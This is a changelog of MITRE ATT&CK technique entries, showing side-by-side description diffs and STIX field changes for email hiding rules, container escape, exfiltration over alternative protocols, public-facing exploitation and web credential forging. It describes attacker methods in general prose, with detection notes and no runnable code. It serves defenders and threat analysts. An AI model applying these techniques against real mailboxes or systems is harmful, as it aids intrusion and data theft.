t1Adversaries may use email rules to hide inbound emails in a t1Adversaries may use email rules to hide inbound emails in a 
>compromised user's mailbox. Many email clients allow users t>compromised user's mailbox. Many email clients allow users t
>o create inbox rules for various email functions, including >o create inbox rules for various email functions, including 
>moving emails to other folders, marking emails as read, or d>moving emails to other folders, marking emails as read, or d
>eleting emails. Rules may be created or modified within emai>eleting emails. Rules may be created or modified within emai
>l clients or through external features such as the <code>New>l clients or through external features such as the <code>New
>-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell]>-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell]
>(https://attack.mitre.org/techniques/T1059/001) cmdlets on W>(https://attack.mitre.org/techniques/T1059/001) cmdlets on W
>indows systems.(Citation: Microsoft Inbox Rules)(Citation: M>indows systems.(Citation: Microsoft Inbox Rules)(Citation: M
>acOS Email Rules)(Citation: Microsoft New-InboxRule)(Citatio>acOS Email Rules)(Citation: Microsoft New-InboxRule)(Citatio
>n: Microsoft Set-InboxRule)  Adversaries may utilize email r>n: Microsoft Set-InboxRule)  Adversaries may utilize email r
>ules within a compromised user's mailbox to delete and/or mo>ules within a compromised user's mailbox to delete and/or mo
>ve emails to less noticeable folders. Adversaries may do thi>ve emails to less noticeable folders. Adversaries may do thi
>s to hide security alerts, C2 communication, or responses to>s to hide security alerts, C2 communication, or responses to
> [Internal Spearphishing](https://attack.mitre.org/technique> [Internal Spearphishing](https://attack.mitre.org/technique
>s/T1534) emails sent from the compromised account.  Any user>s/T1534) emails sent from the compromised account.  Any user
> or administrator within the organization (or adversary with> or administrator within the organization (or adversary with
> valid credentials) may be able to create rules to automatic> valid credentials) may be able to create rules to automatic
>ally move or delete emails. These rules can be abused to imp>ally move or delete emails. These rules can be abused to imp
>air/delay detection had the email content been immediately s>air/delay detection had the email content been immediately s
>een by a user or defender. Malicious rules commonly filter o>een by a user or defender. Malicious rules commonly filter o
>ut emails based on key words (such as <code>malware</code>, >ut emails based on key words (such as <code>malware</code>, 
><code>suspicious</code>, <code>phish</code>, and <code>hack<><code>suspicious</code>, <code>phish</code>, and <code>hack<
>/code>) found in message bodies and subject lines. (Citation>/code>) found in message bodies and subject lines. (Citation
>: Microsoft Cloud App Security)>: Microsoft Cloud App Security)  In some environments, admin
 >istrators may be able to enable email rules that operate org
 >anization-wide rather than on individual inboxes. For exampl
 >e, Microsoft Exchange supports transport rules that evaluate
 > all mail an organization receives against user-specified co
 >nditions, then performs a user-specified action on mail that
 > adheres to those conditions.(Citation: Microsoft Mail Flow 
 >Rules 2023) Adversaries that abuse such features may be able
 > to automatically modify or delete all emails related to spe
 >cific topics (such as internal security incident notificatio
 >ns).
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-12 15:22:29.599000+00:002023-04-12 20:42:20.079000+00:00
descriptionAdversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).
external_references[3]['source_name']Microsoft Inbox RulesMicrosoft Mail Flow Rules 2023
external_references[3]['description']Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.
external_references[3]['url']https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
external_references[4]['source_name']Microsoft New-InboxRuleMicrosoft Inbox Rules
external_references[4]['description']Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-pshttps://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
external_references[5]['source_name']Microsoft Set-InboxRuleMicrosoft New-InboxRule
external_references[5]['description']Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.
external_references[5]['url']https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-pshttps://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
external_references[6]['source_name']Microsoft Cloud App SecurityMicrosoft Set-InboxRule
external_references[6]['description']Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.
external_references[6]['url']https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Cloud App Security', 'description': 'Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.', 'url': 'https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154'}
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

[T1611] Escape to Host

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 20:03:06.707000+00:002023-04-15 16:21:04.265000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesContainer: Container Creation
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesContainer: Container Creation

[T1048] Exfiltration Over Alternative Protocol

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may steal data by exfiltrating it over a differet1Adversaries may steal data by exfiltrating it over a differe
>nt protocol than that of the existing command and control ch>nt protocol than that of the existing command and control ch
>annel. The data may also be sent to an alternate network loc>annel. The data may also be sent to an alternate network loc
>ation from the main command and control server.    Alternate>ation from the main command and control server.    Alternate
> protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other> protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other
> network protocol not being used as the main command and con> network protocol not being used as the main command and con
>trol channel. Different protocol channels could also include>trol channel. Adversaries may also opt to encrypt and/or obf
> Web services such as cloud storage. Adversaries may also op>uscate these alternate channels.   [Exfiltration Over Altern
>t to encrypt and/or obfuscate these alternate channels.   [E>ative Protocol](https://attack.mitre.org/techniques/T1048) c
>xfiltration Over Alternative Protocol](https://attack.mitre.>an be done using various common operating system utilities s
>org/techniques/T1048) can be done using various common opera>uch as [Net](https://attack.mitre.org/software/S0039)/SMB or
>ting system utilities such as [Net](https://attack.mitre.org> FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linu
>/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct >x <code>curl</code> may be used to invoke protocols such as 
>2016) On macOS and Linux <code>curl</code> may be used to in>HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 
>voke protocols such as HTTP/S or FTP/S to exfiltrate data fr>20 macOS Common Tools and Techniques)  Many IaaS and SaaS pl
>om a system.(Citation: 20 macOS Common Tools and Techniques)>atforms (such as Microsoft Exchange, Microsoft SharePoint, G
> >itHub, and AWS S3) support the direct download of files, ema
 >ils, source code, and other sensitive information via the we
 >b console or [Cloud API](https://attack.mitre.org/techniques
 >/T1059/009).

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
x_mitre_network_requirementsFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:49:28.766000+00:002023-04-15 00:58:36.287000+00:00
descriptionAdversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).
external_references[1]['source_name']Palo Alto OilRig Oct 2016University of Birmingham C2
external_references[1]['description']Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name']20 macOS Common Tools and TechniquesPalo Alto OilRig Oct 2016
external_references[2]['description']Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[2]['url']https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[3]['source_name']University of Birmingham C220 macOS Common Tools and Techniques
external_references[3]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[3]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
x_mitre_version1.31.4
x_mitre_data_sources[3]Command: Command ExecutionCloud Storage: Cloud Storage Access
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesCommand: Command Execution
x_mitre_platformsOffice 365
x_mitre_platformsSaaS
x_mitre_platformsIaaS
x_mitre_platformsGoogle Workspace
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1041] Exfiltration Over C2 Channel

Current version: 2.2

Version changed from: 2.1 → 2.2

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
x_mitre_network_requirementsFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:45:50.620000+00:002023-04-07 17:09:14.040000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentFile: File Access
x_mitre_data_sources[1]Command: Command ExecutionNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Network Traffic: Network Connection CreationCommand: Command Execution
x_mitre_data_sources[4]File: File AccessNetwork Traffic: Network Connection Creation
x_mitre_version2.12.2

[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may steal data by exfiltrating it over an un-enct1Adversaries may steal data by exfiltrating it over an un-enc
>rypted network protocol other than that of the existing comm>rypted network protocol other than that of the existing comm
>and and control channel. The data may also be sent to an alt>and and control channel. The data may also be sent to an alt
>ernate network location from the main command and control se>ernate network location from the main command and control se
>rver.   Adversaries may opt to obfuscate this data, without >rver.(Citation: copy_cmd_cisco)  Adversaries may opt to obfu
>the use of encryption, within network protocols that are nat>scate this data, without the use of encryption, within netwo
>ively unencrypted (such as HTTP, FTP, or DNS). This may incl>rk protocols that are natively unencrypted (such as HTTP, FT
>ude custom or publicly available encoding/compression algori>P, or DNS). This may include custom or publicly available en
>thms (such as base64) as well as embedding data within proto>coding/compression algorithms (such as base64) as well as em
>col headers and fields. >bedding data within protocol headers and fields. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_network_requirementsFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-12 19:57:45.277000+00:002023-04-12 23:39:25.476000+00:00
descriptionAdversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco) Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
external_references[1]['source_name']University of Birmingham C2copy_cmd_cisco
external_references[1]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.
external_references[1]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionNetwork Traffic: Network Connection Creation
x_mitre_data_sources[4]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Content
x_mitre_detectionAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) For network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1190] Exploit Public-Facing Application

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may attempt to take advantage of a weakness in at1Adversaries may attempt to exploit a weakness in an Internet
>n Internet-facing computer or program using software, data, >-facing host or system to initially access a network. The we
>or commands in order to cause unintended or unanticipated be>akness in the system can be a software bug, a temporary glit
>havior. The weakness in the system can be a bug, a glitch, o>ch, or a misconfiguration.  Exploited applications are often
>r a design vulnerability. These applications are often websi> websites/web servers, but can also include databases (like 
>tes, but can include databases (like SQL), standard services>SQL), standard services (like SMB or SSH), network device ad
> (like SMB or SSH), network device administration and manage>ministration and management protocols (like SNMP and Smart I
>ment protocols (like SNMP and Smart Install), and any other >nstall), and any other system with Internet accessible open 
>applications with Internet accessible open sockets, such as >sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple
>web servers and related services.(Citation: NVD CVE-2016-666> SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In
>2)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US->frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic
>CERT TA18-106A Network Infrastructure Devices 2018)(Citation>e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla
>: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7>w being exploited this may also involve [Exploitation for De
>169) Depending on the flaw being exploited this may include >fense Evasion](https://attack.mitre.org/techniques/T1211).  
>[Exploitation for Defense Evasion](https://attack.mitre.org/> If an application is hosted on cloud-based infrastructure a
>techniques/T1211).   If an application is hosted on cloud-ba>nd/or is containerized, then exploiting it may lead to compr
>sed infrastructure and/or is containerized, then exploiting >omise of the underlying instance or container. This can allo
>it may lead to compromise of the underlying instance or cont>w an adversary a path to access the cloud or container APIs,
>ainer. This can allow an adversary a path to access the clou> exploit container host access via [Escape to Host](https://
>d or container APIs, exploit container host access via [Esca>attack.mitre.org/techniques/T1611), or take advantage of wea
>pe to Host](https://attack.mitre.org/techniques/T1611), or t>k identity and access management policies.  Adversaries may 
>ake advantage of weak identity and access management policie>also exploit edge network infrastructure and related applian
>s.  For websites and databases, the OWASP top 10 and CWE top>ces, specifically targeting devices that do not support robu
> 25 highlight the most common web-based vulnerabilities.(Cit>st host-based defenses.(Citation: Mandiant Fortinet Zero Day
>ation: OWASP Top 10)(Citation: CWE top 25)>)(Citation: Wired Russia Cyberwar)  For websites and databas
 >es, the OWASP top 10 and CWE top 25 highlight the most commo
 >n web-based vulnerabilities.(Citation: OWASP Top 10)(Citatio
 >n: CWE top 25)

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 17:06:53.032000+00:002023-04-14 22:18:39.190000+00:00
descriptionAdversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
external_references[3]['source_name']NVD CVE-2016-6662Wired Russia Cyberwar
external_references[3]['description']National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.
external_references[3]['url']https://nvd.nist.gov/vuln/detail/CVE-2016-6662https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/
external_references[4]['source_name']NVD CVE-2014-7169Mandiant Fortinet Zero Day
external_references[4]['description']National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.
external_references[4]['url']https://nvd.nist.gov/vuln/detail/CVE-2014-7169https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
external_references[5]['source_name']Cisco Blog Legacy Device AttacksNVD CVE-2016-6662
external_references[5]['description']Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.
external_references[5]['url']https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954https://nvd.nist.gov/vuln/detail/CVE-2016-6662
external_references[6]['source_name']OWASP Top 10NVD CVE-2014-7169
external_references[6]['description']OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.
external_references[6]['url']https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Projecthttps://nvd.nist.gov/vuln/detail/CVE-2014-7169
external_references[7]['source_name']US-CERT TA18-106A Network Infrastructure Devices 2018Cisco Blog Legacy Device Attacks
external_references[7]['description']US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[7]['url']https://us-cert.cisa.gov/ncas/alerts/TA18-106Ahttps://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'OWASP Top 10', 'description': 'OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.', 'url': 'https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project'}
external_references{'source_name': 'US-CERT TA18-106A Network Infrastructure Devices 2018', 'description': 'US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/TA18-106A'}

[T1068] Exploitation for Privilege Escalation

Current version: 1.5

Version changed from: 1.4 → 1.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-16 19:25:12.835000+00:002023-04-07 17:13:54.168000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Driver: Driver LoadProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationDriver: Driver Load
x_mitre_version1.41.5

[T1606] Forge Web Credentials

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may forge credential materials that can be used t1Adversaries may forge credential materials that can be used 
>to gain access to web applications or Internet services. Web>to gain access to web applications or Internet services. Web
> applications and services (hosted in cloud SaaS environment> applications and services (hosted in cloud SaaS environment
>s or on-premise servers) often use session cookies, tokens, >s or on-premise servers) often use session cookies, tokens, 
>or other materials to authenticate and authorize user access>or other materials to authenticate and authorize user access
>.  Adversaries may generate these credential materials in or>.  Adversaries may generate these credential materials in or
>der to gain access to web resources. This differs from [Stea>der to gain access to web resources. This differs from [Stea
>l Web Session Cookie](https://attack.mitre.org/techniques/T1>l Web Session Cookie](https://attack.mitre.org/techniques/T1
>539), [Steal Application Access Token](https://attack.mitre.>539), [Steal Application Access Token](https://attack.mitre.
>org/techniques/T1528), and other similar behaviors in that t>org/techniques/T1528), and other similar behaviors in that t
>he credentials are new and forged by the adversary, rather t>he credentials are new and forged by the adversary, rather t
>han stolen or intercepted from legitimate users. The generat>han stolen or intercepted from legitimate users. The generat
>ion of web credentials often requires secret values, such as>ion of web credentials often requires secret values, such as
> passwords, [Private Keys](https://attack.mitre.org/techniqu> passwords, [Private Keys](https://attack.mitre.org/techniqu
>es/T1552/004), or other cryptographic seed values.(Citation:>es/T1552/004), or other cryptographic seed values.(Citation:
> GitHub AWS-ADFS-Credential-Generator)  Once forged, adversa> GitHub AWS-ADFS-Credential-Generator) Adversaries may also 
>ries may use these web credentials to access resources (ex: >forge tokens by taking advantage of features such as the `As
>[Use Alternate Authentication Material](https://attack.mitre>sumeRole` and `GetFederationToken` APIs in AWS, which allow 
>.org/techniques/T1550)), which may bypass multi-factor and o>users to request temporary security credentials.(Citation: A
>ther authentication protection mechanisms.(Citation: Pass Th>WS Temporary Security Credentials)  Once forged, adversaries
>e Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)> may use these web credentials to access resources (ex: [Use
>(Citation: Microsoft SolarWinds Customer Guidance)> Alternate Authentication Material](https://attack.mitre.org
 >/techniques/T1550)), which may bypass multi-factor and other
 > authentication protection mechanisms.(Citation: Pass The Co
 >okie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Cit
 >ation: Microsoft SolarWinds Customer Guidance)  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dylan']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 14:26:52.179000+00:002023-04-12 21:35:48.084000+00:00
